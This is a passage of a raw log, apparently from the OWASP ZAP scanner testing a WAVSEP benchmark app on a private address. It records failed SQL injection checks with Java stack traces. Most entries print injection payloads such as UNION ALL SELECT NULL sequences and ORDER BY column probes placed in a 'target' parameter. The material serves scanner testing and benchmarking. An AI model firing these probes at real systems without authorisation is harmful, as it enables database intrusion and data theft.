org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680778 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680779 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680785 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680786 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680787 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 8401-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 8401-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680788 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680788 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680789 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 4608-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 4608-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680789 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680791 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680791 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680792 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680792 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at 